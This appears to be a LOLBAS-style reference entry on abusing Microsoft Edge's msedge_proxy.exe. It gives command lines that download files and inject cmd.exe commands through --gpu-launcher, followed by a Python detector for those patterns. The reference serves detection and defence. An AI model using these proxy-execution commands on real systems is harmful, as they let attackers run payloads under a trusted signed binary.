.. /msedge_proxy.exe

Microsoft Edge Browser


Paths:

Acknowledgements:

Download

msedge_proxy.exe will download a malicious file.
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe http://example.com/test.zip
Usecase: Download file from the internet
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105



Edge will silently download the file.
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\Desktop\\test.json &&"
Usecase: Download file from the internet
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105



Execute

msedge_proxy.exe will execute the file in the background.
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\cmd.exe /c ping google.com &&"
Usecase: Executes a process under a trusted Microsoft signed binary
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1218
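
Detection

One way to flag the command lines above in process-creation telemetry, as an added example that is not part of the original entry. The field names Image and CommandLine follow Sysmon Event ID 1; the findings helper and the sample events are constructed for illustration.

```python
import re

# Tokenizer for a Windows command line: a "quoted run" stays inside its token, so
# --gpu-launcher="cmd.exe /c ..." is one token. Simplified: ignores \" escapes.
TOKEN_RE = re.compile(r'(?:[^\s"]|"[^"]*")+')

def findings(event):
    """Return (reason, value) pairs when an event matches the msedge_proxy.exe
    command-line patterns on this page; an empty list means no match."""
    image = event["Image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image != "msedge_proxy.exe":
        return []
    reasons = []
    for tok in TOKEN_RE.findall(event["CommandLine"]):
        low = tok.strip('"').lower()
        if low.startswith("--gpu-launcher"):
            # In this page's examples the switch value is the command that runs.
            reasons.append(("gpu-launcher", tok.partition("=")[2].strip('"')))
        elif low == "--disable-gpu-sandbox":
            reasons.append(("disable-gpu-sandbox", ""))
        elif low.startswith(("http://", "https://")):
            # A bare URL argument, as in the first Download entry.
            reasons.append(("url-argument", tok.strip('"')))
    return reasons

PROXY = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe"
# Constructed events for illustration; not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": PROXY, "CommandLine": f'"{PROXY}" http://example.com/test.zip'},
    {"Image": PROXY, "CommandLine": f'"{PROXY}" --disable-gpu-sandbox '
        r'--gpu-launcher="C:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json'
        r' --output %USERPROFILE%\\Desktop\\test.json &&"'},
    {"Image": PROXY, "CommandLine": f'"{PROXY}" --profile-directory=Default '
        "--app-id=constructedappid"},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": "msedge.exe http://example.com/"},  # other binary: out of scope
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(findings(ev) or "no match")
```

The extracted gpu-launcher value is worth keeping in the alert, since it names the command that was handed to the browser.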